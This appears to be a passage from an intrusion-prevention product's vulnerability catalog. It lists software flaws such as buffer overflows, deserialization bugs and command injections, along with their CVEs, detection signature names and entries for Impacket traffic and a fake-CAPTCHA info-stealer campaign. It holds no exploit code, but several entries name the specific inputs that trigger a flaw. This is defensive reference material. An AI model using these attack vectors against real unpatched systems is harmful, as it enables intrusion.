Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mercury Mail Transport System
Type: Buffer Overflow
Description: There is a stack-based buffer overflow in Mercury Mail Transport System. The affected product does not properly validate continuation data, allowing a remote unauthenticated attacker to cause a denial of service or execute arbitrary code with the privileges of the vulnerable service process.
Situation: IMAP_Mercury-Mail-Transport-System-IMAP-Data-Handling-Buffer-Overflow
References:
CVE-2006-5961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5961
BID-21110
http://www.securityfocus.com/bid/21110
Back to top

iMatix-Corporation-Xitami-Web-Server-BOF

About this vulnerability: Buffer overflow in iMatix Corporation Xitami Web Server
Risk: High
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Imatix Xitami for Windows
Type: Buffer Overflow
Description: A stack based buffer overflow in iMatix Corporation Xitami Web Server which allows a remote attacker to execute arbitrary code via a long If-Modified-Since header.
Situation: HTTP_CSH-iMatix-Corporation-Xitami-Web-Server-BOF
References:
CVE-2007-5067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5067
BID-25772
http://www.securityfocus.com/bid/25772
OSVDB-40594
http://www.osvdb.org/40594
Back to top

iMesh-Toolbar

About this vulnerability: iMesh Internet Explorer Toolbar
Risk: Low
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: iMesh Toolbar
Type: Misconfiguration
Description: iMesh toolbar is an internet explorer toolbar bundled with the iMesh peer to peer file shering software. It may show advertisement popus and may be considered unwanted software by some organizations.
Situation: HTTP_CSH-iMesh-Toolbar-Search
HTTP_CSH-iMesh-Toolbar-Popup-Content-Request
Back to top

Impacket-Generated-Traffic

About this vulnerability: Impacket generated traffic was detected
Risk: High
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Impacket generated traffic was detected.
Situation: SMB-TCP_Impacket-Generated-Traffic
Back to top

Imperva-SecureSphere-Pws-Command-Injection

About this vulnerability: A vulnerability in Imperva SecureSphere
Risk: High
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Imperva SecureSphere
Type: Input Validation
Description: A vulnerability in Imperva SecureSphere, versions 13.0 through 13.2, which allows remote attackers to execute arbitrary commands on the target system through the PWS service due to the insufficient sanitization of user supplied command parameters.
Situation: HTTP_CRL-Imperva-SecureSphere-Pws-Command-Injection
Back to top

Includer-Command-Execution

About this vulnerability: Command execution vulnerability in the Includer
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: The Includer
Type: Metacharacter
Description: Command execution vulnerability exists with the includer.cgi in the Includer. Remote attacker can exploit this vulnerability to execute arbitrary commands on the Web server.
Situation: HTTP_CSU-Includer-Command-Execution
References:
CVE-2005-0689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0689
BID-12738
http://www.securityfocus.com/bid/12738
Back to top

Incredifind

About this vulnerability: IncrediFind
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IncrediFind
Type: Misconfiguration
Description: Incredifind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Incredifind
Back to top

Index-Request-Type

About this vulnerability: A vulnerable non-standard HTTP request method.
Risk: Low
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Insecure Configuration
Description: A non-standard HTTP INDEX-request allows the attacker to view arbitrary directories in some vulnerable servers.
Situation: HTTP_CRL-Index-Request-Type
Back to top

Indexing-Service-Memory-Corruption-CVE-2009-2507

About this vulnerability: A remote code execution vulnerability in the Indexing Service on Windows systems
Risk: High
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a remote code execution vulnerability in the Indexing Service on Windows systems.
Situation: HTTP_SS-Indexing-Service-Memory-Corruption-CVE-2009-2507
File-Text_Indexing-Service-Memory-Corruption-CVE-2009-2507
References:
CVE-2009-2507
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2507
MS09-057
http://technet.microsoft.com/security/bulletin/MS09-057
Back to top

Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: Moderate
First detected in: sgpkg-ips-1631-5242
Last changed: sgpkg-ips-1631-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the AbstractGatewayFunction class. A remote authenticated attacker could exploit the vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.
Situation: File-TextId_Inductive-Automation-Ignition-Abstractgatewayfunction-Insecure-Deserialization
References:
CVE-2023-39473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39473
Back to top

Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: Moderate
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1562-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Inductive Automation Ignition. The vulnerability is due to improper use of the Apache Wicket web application framework. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in the attacker being able to read or modify parts of the target server configuration and data.
Situation: HTTP_CS-Inductive-Automation-Ignition-Authenticatedpage-Authentication-Bypass
References:
CVE-2022-35869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35869
Back to top

Inductive-Automation-Ignition-Base64element-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: High
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to improper input validation in the Base64Element class. Successfully exploiting this vulnerability could result in remote code execution in the security context of SYSTEM.
Situation: File-TextId_Inductive-Automation-Ignition-Base64element-Insecure-Deserialization
References:
CVE-2023-50220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50220
Back to top

Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: Moderate
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the ModuleInvoke class. A remote authenticated attacker could exploit the vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.
Situation: File-TextId_Inductive-Automation-Ignition-ModuleInvoke-Insecure-Deserialization
References:
CVE-2023-50218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50218
Back to top

Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: A cross-site scripting vulnerability exists in Inductive Automation Ignition. The vulnerability is due to lack of validating user provided data within OPC UA Client. An attacker could exploit the vulnerabilities by enticing the target user to connect to a malicious server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.
Situation: Generic_SS-Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting
References:
CVE-2023-38124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38124
Back to top

Inductive-Automation-Ignition-Project-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: High
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: There exists a vulnerability in Inductive Automation Ignition, multiple versions, which allows remote attackers to obtain sensitive information due to the lack of proper user input validation.
Situation: HTTP_CRL-Inductive-Automation-Ignition-Project-Deserialization
References:
CVE-2020-10644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10644
Back to top

Inductive-Automation-Ignition-runQuery-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: Moderate
First detected in: sgpkg-ips-1698-5242
Last changed: sgpkg-ips-1698-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data within the RunQuery class. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.
Situation: File-TextId_Inductive-Automation-Ignition-runQuery-Insecure-Deserialization
References:
CVE-2023-50219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50219
Back to top

Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: High
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Inductive Automation Ignition. The vulnerability is due to deserialization of untrusted data when processing ServerMessage messages. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in remote code execution under the security context of SYSTEM on the target server.
Situation: File-Binary_Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization
References:
CVE-2022-35870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35870
Back to top

Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization

About this vulnerability: A vulnerability in Inductive Automation Ignition
Risk: Moderate
First detected in: sgpkg-ips-1260-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Inductive Automation Ignition
Type: Input Validation
Description: Insecure deserialization of user-sent objects causes a vulnerability in Inductive Automation Ignition. A successful exploit may allow an attacker to execute arbitrary code on the target system with the privileges of the affected process.
Situation: HTTP_CS-Inductive-Automation-Ignition-Servermessageheader-Insecure-Deserialization
References:
CVE-2020-12000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12000
Back to top

Indusoft-CEServer-Buffer-Overflow

About this vulnerability: A vulnerability in InduSoft CEServer
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: InduSoft CEServer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in in InduSoft CEServer which allows remote attacker to execute malicious code on target system.
Situation: Generic_CS-Indusoft-CEServer-Buffer-Overflow
Back to top

Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in InduSoft Thin Client
Risk: Moderate
First detected in: sgpkg-ips-477-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: InduSoft Thin Client
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in InduSoft Thin Client. The vulnerability is due to lack of input validation on the InternationalSeparator parameter of the ISSYMBOL.ISSymbolCtrl ActiveX control. An attacker can exploit this vulnerability by enticing the user to browse to a specially crafted web page using Internet Explorer. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Indusoft-Thin-Client-ActiveX-Heap-Buffer-Overflow
References:
CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340
BID-47596
http://www.securityfocus.com/bid/47596
OSVDB-72865
http://www.osvdb.org/72865
Back to top

Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF

About this vulnerability: A vulnerability in InduSoft Thin Client
Risk: Moderate
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: InduSoft Thin Client
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in the InduSoft Thin Client. The vulnerability is due to lack of input validation on the InternationalOrder parameter of the ISSYMBOL.ISSymbolCtrl ActiveX control. An attacker can exploit this vulnerability by enticing the user to browse to a specially crafted webpage using Internet Explorer. Successful exploitation can result in arbitrary code execution in the context of the currently logged in user.
Situation: File-Text_Indusoft-Thin-Client-ISSymbol-ActiveX-InternationalOrder-Heap-BOF
References:
CVE-2011-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0340
BID-47596
http://www.securityfocus.com/bid/47596
OSVDB-72865
http://www.osvdb.org/72865
Back to top

Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow

About this vulnerability: A vulnerability in InduSoft Web Studio
Risk: High
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: InduSoft Web Studio
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been identified in the Remote Agent component of InduSoft Web Studio. The vulnerability is due to an insufficient boundary check when copying user supplied data using the "Remove File" (0x15) operation. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to port 4322/TCP. In the event of a successful attack, attacker code will be executed in the security context of the target user running the Remote Agent component.
Situation: Generic_CS-Indusoft-Web-Studio-Remote-Agent-Buffer-Overflow
References:
CVE-2011-4052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4052
Back to top

Indusoft-Web-Studio-Remote-File-Access

About this vulnerability: A Indusoft Web Studio Remote File Access vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: InduSoft Web Studio
Type: Directory Traversal
Description: A vulnerability in NTWebServer in InduSoft Web Studio, versions 6.1 and 7.x before 7.0+Patch 1, which allows remote attackers to execute arbitrary code and read arbitrary files on the remote system via a directory traversal.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2011-1900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1900
BID-47842
http://www.securityfocus.com/bid/47842
OSVDB-73413
http://www.osvdb.org/73413
Back to top

Indusoft-Web-Studio-sDoS-Denial-Of-Service

About this vulnerability: Indusoft Web Studio sDoS denial of service.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: InduSoft Web Studio
Type: Buffer Overflow
Description: A heap overflow vulnerability in Indusoft Web Studio that allows a remote attacker to crash the service by sending a specially crafted HTTP request.
Situation: HTTP_CSU-Indusoft-Web-Studio-sDoS-Denial-Of-Service
Back to top

Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations

About this vulnerability: A vulnerability in InduSoft Web Studio
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: InduSoft Web Studio
Type: Malfunction
Description: A code execution vulnerability has been identified in the Remote Agent component of InduSoft Web Studio. The vulnerability is due to the absence of authentication for incoming requests to the Remote Agent service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable service. In the event of a successful attack, attacker code will be executed in the security context of the target user.
Situation: Generic_CS-Indusoft-Web-Studio-Unauthenticated-Insecure-Remote-Operations
References:
CVE-2011-4051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4051
OSVDB-77179
http://www.osvdb.org/77179
Back to top

Information-Stealer-Using-Fake-Captcha

About this vulnerability: An attempt to install malware via fake CAPTCHA detected
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Windows
Software: Any Software
Type: Input Validation
Description: In a large-scale fake CAPTCHA campaign analyzed by Guardio Labs, the CAPTCHA page includes a JavaScript snippet that silently copies a malicious PowerShell command to the victim's clipboard. It then gives instructions to the victim on how to paste the "CAPTCHA solution" into the Windows Run dialog and execute it. Once the PowerShell command is executed, it downloads the Lumma Stealer from a remote server and executes it on the victim's device. This fingerprint detects such fake CAPTCHA pages.
Situation: File-Text_Information-Stealer-Using-Fake-Browser-Dialogs
Back to top

Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Ingres Ingres Database
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ingres Database
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in Ingres Database Communications Server. The vulnerability is due to insufficient boundary check when handling user supplied data. A remote unauthenticated attacker may leverage this vulnerability by sending a specially crafted request. Successful exploitation may cause the execution of arbitrary code on the target system with SYSTEM privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the SYSTEM account on Windows platforms. In an attack case where code injection is not successful, the Communications Server process will terminate abnormally, creating a denial-of-service condition.
Situation: Generic_CS-Ingres-Database-Communications-Server-Component-Heap-Buffer-Overflow
References:
CVE-2007-3334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
BID-24585
http://www.securityfocus.com/bid/24585
OSVDB-37488
http://www.osvdb.org/37488
OSVDB-37487
http://www.osvdb.org/37487
Back to top

Ingres-Database-Iidbms-Heap-Overflow

About this vulnerability: A vulnerability in Ingres Ingres Database
Risk: High
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ingres Database
Type: Buffer Overflow
Description: A vulnerability exists in Ingres Database that could be exploited by remote attackers to compromise a vulnerable system. The vulnerability is due to insufficient boundary checking in the iidbms component of the Ingres Database. Remote unauthenticated attackers could exploit this vulnerability by sending a specially crafted request to the database server. Successful exploitation would cause a heap buffer overflow that could cause a denial of service, or allow execution of arbitrary code with the privileges of the affected process.
Situation: Generic_CS-Ingres-Database-Iidbms-Heap-Overflow
Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-2
Back to top

Ingres-Database-Iidbms-Heap-Overflow-3

About this vulnerability: A vulnerability in the Ingres Database
Risk: Moderate
First detected in: sgpkg-ips-689-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ingres Database
Type: Buffer Overflow
Description: There is an buffer length validation error in the Ingres Database Server. The application fails to perform adequate boundary checks for a length field, which is treated as a signed integer.
Situation: Generic_CS-Ingres-Database-Iidbms-Heap-Overflow-3
References:
BID-38001
http://www.securityfocus.com/bid/38001
OSVDB-62080
http://www.osvdb.org/62080
Back to top

Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Ingres Database Server
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ingres Database
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Ingres Database Server. An attacker with valid privileges of table operations to the database can cause a denial of service or compromise the vulnerable system.
Situation: Generic_Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow
References:
CVE-2007-3338
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
BID-24585
http://www.securityfocus.com/bid/24585
OSVDB-37483
http://www.osvdb.org/37483
Back to top

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1097

About this vulnerability: An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes
Risk: High
First detected in: sgpkg-ips-1856-5242
Last changed: sgpkg-ips-1856-5242
Platform: Generic
Software: ingress-nginx
Type: Input Validation
Description: A security issue was discovered in ingress-nginx where the "auth-tls-match-cn" ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.
Situation: File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection
References:
CVE-2025-1097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1097
Back to top

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1098

About this vulnerability: An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes
Risk: High
First detected in: sgpkg-ips-1856-5242
Last changed: sgpkg-ips-1856-5242
Platform: Generic
Software: ingress-nginx
Type: Input Validation
Description: A security issue was discovered in ingress-nginx where the "mirror-target" and "mirror-host" Ingress annotations can be used to inject arbitrary configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.
Situation: File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection
References:
CVE-2025-1098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1098
Back to top

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-1974

About this vulnerability: An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes
Risk: High
First detected in: sgpkg-ips-1856-5242
Last changed: sgpkg-ips-1856-5242
Platform: Generic
Software: ingress-nginx
Type: Input Validation
Description: A security issue was discovered in Kubernetes where under certain conditions, an unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.
Situation: File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection
References:
CVE-2025-1974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1974
Back to top

Ingress-Nginx-Controller-Kubernetes-Annotation-Injection-CVE-2025-24514

About this vulnerability: An attempt to exploit a vulnerability in Ingress NGINX Controller for Kubernetes
Risk: High
First detected in: sgpkg-ips-1856-5242
Last changed: sgpkg-ips-1856-5242
Platform: Generic
Software: ingress-nginx
Type: Input Validation
Description: A security issue was discovered in ingress-nginx where the "auth-url" ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of secrets accessible to the controller.
Situation: File-Text_Ingress-Nginx-Controller-Kubernetes-Annotation-Injection
References:
CVE-2025-24514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24514
Back to top

Insecure-Rc4-Cipher-Suite

About this vulnerability: Insecure RC4 Cipher Suite
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Configuration Error
Description: The RC4 stream cipher has multiple cryptographic weaknesses and it has been deemed unsecure. Its usage has been prohibited my the IETF.
Situation: HTTPS_SS-Insecure-Rc4-Cipher-Suite-Usage
References:
CVE-2015-2808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808
Back to top

Insecure-Root-Login

About this vulnerability: Root login cleartext protocol
Risk: Low
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: This vulnerability is referenced by fingerprints that detect root login attempts via FTP or Telnet protocol. These protocols transfer all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation: Telnet_STS-Telnet-Root-Login-Attempt
Back to top

Insecure-X-Server-Allows-Sniffing

About this vulnerability: Vulnerable X server - allows sniffing
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic X server
Type: Misconfiguration
Description: Some X servers have disabled authentication. This allows remote hosts to access the X server's resources. This means the capability of logging key strokes, mouse movements and stealing screen captures.
Situation: X11_Remote-XOpen
References:
CVE-1999-0526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0526
Back to top

IntegraXOR-SQL-Injection

About this vulnerability: A vulnerability in IntegraXOR
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IntegraXOR
Type: SQL Injection
Description: There is an SQL injection vulnerability in IntegraXOR which allows an attacker to modify data and read/write arbitrary files.
Situation: HTTP_CRL-IntegraXOR-SQL-Injection
Back to top

Intel-AMT-And-ISM-Privilege-Escalation-CVE-2020-8758

About this vulnerability: A privilege escalation vulnerability in Intel AMT and Intel ISM
Risk: High
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Intel AMT; Intel ISM
Type: Input Validation
Description: A privilege escalation vulnerability exists in Intel Active Management Technology (AMT), and Intel Standard Manageability (ISM). The vulnerability is due to improper buffer restrictions in network subsystems in versions before 11.8.79, 11.12.79, 11.22.79, 12.0.68 and 14.0.39.
Situation: HTTP_CSH-Negative-Content-Length-Value
HTTP_CSH-Invalid-Negative-Content-Length-Value
References:
CVE-2020-8758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8758
Back to top

Intel-AMT-CVE-2017-5689

About this vulnerability: A vulnerability in Intel AMT
Risk: High
First detected in: sgpkg-ips-899-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Intel AMT
Type: Input Validation
Description: A remote attacker can manage the AMT with admin rights without knowledge of the password. The vulnerability has been named "Silent Bob is silent".
Situation: HTTP_CHS-Intel-AMT-CVE-2017-5689
References:
CVE-2017-5689
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
Back to top

Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005

About this vulnerability: A vulnerability in Intelbras WiFiber
Risk: High
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Intelbras WiFiber
Type: Input Validation
Description: A command injection vulnerability has been reported in Intelbras WiFiber 120AC inMesh device firmware before version 1-1-220826. An authenticated attacker could use this vulnerability to execute arbitrary commands.
Situation: HTTP_CRL-Intelbras-Wifiber-120AC-inMesh-Command-Injection-CVE-2022-40005
References:
CVE-2022-40005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40005
Back to top

Intellian-Aptus-Web-OS-Command-Injection

About this vulnerability: Intellian Aptus Web OS Command Injection
Risk: Moderate
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Intellian Aptus Web OS
Type: Malfunction
Description: A command injection vulnerability in Intellian Aptus Web OS
Situation: File-Text_Intellian-Aptus-Web-OS-Command-Injection
References:
CVE-2020-7980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7980
Back to top

Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE

About this vulnerability: An attempt to exploit a vulnerability in Subrion CMS detected
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: Subrion CMS
Type: Input Validation
Description: A vulnerability in Subrion CMS, versions 4.2.1 and before, which allows remote attackers to upload and execute arbitrary code due to the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files.
Situation: HTTP_CS-Intelliants-Subrion-CMS-Authenticated-File-Upload-Bypass-To-RCE
References:
CVE-2018-19422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19422
Back to top

IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in IntelliCom NetBiter Config
Risk: High
First detected in: sgpkg-ips-273-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IntelliCom NetBiter Config Utility
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the IntelliCom NetBiter Config utility. The vulnerability is due to a boundary error while parsing an overly long 'hn' (Hostname) parameter. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted UDP packet to port 3250 on the target host. Once the packet is received, a NetBiter Config console user must be enticed to open the received message. Successful exploitation allows arbitrary code execution on the target with the privileges of the currently logged on user.
Situation: Generic_UDP-IntelliCom-NetBiter-Config-Utility-Hostname-Stack-Buffer-Overflow
References:
CVE-2009-4462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4462
BID-37325
http://www.securityfocus.com/bid/37325
Back to top

Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow

About this vulnerability: An attempt to exploit vulnerability in Interactive Data eSignal detected
Risk: Moderate
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-1332-5242
Platform: Generic
Software: Interactive Data eSignal
Type: Malfunction
Description: A vulnerability in Interactive Data eSignal
Situation: SMTP_CS-Interactive-Data-Esignal-Stack-Buffer-Overflow
File-Binary_Interactive-Data-Esignal-Stack-Buffer-Overflow
File-TextId_Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
References:
CVE-2011-3494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3494
Back to top

Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676

About this vulnerability: A vulnerability in Internet Explorer 11.0
Risk: High
First detected in: sgpkg-ips-1132-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists an information disclosure vulnerability in Internet Explorer 11.0. Successful exploitation of this issue can result in information disclosure.
Situation: File-Text_Internet-Explorer-11-Information-Disclosure-Vulnerability-CVE-2019-0676
References:
CVE-2019-0676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0676
ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb
Back to top

Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting

About this vulnerability: A cross-site scripting vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Microsoft Internet Explorer 7. The vulnerability is due to an input validation error in the local resource page navcancl.htm when generating the page refresh link in Internet Explorer 7. Successful exploitation can allow the attacker to execute a cross-site scripting or phishing attack.
Situation: HTTP_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
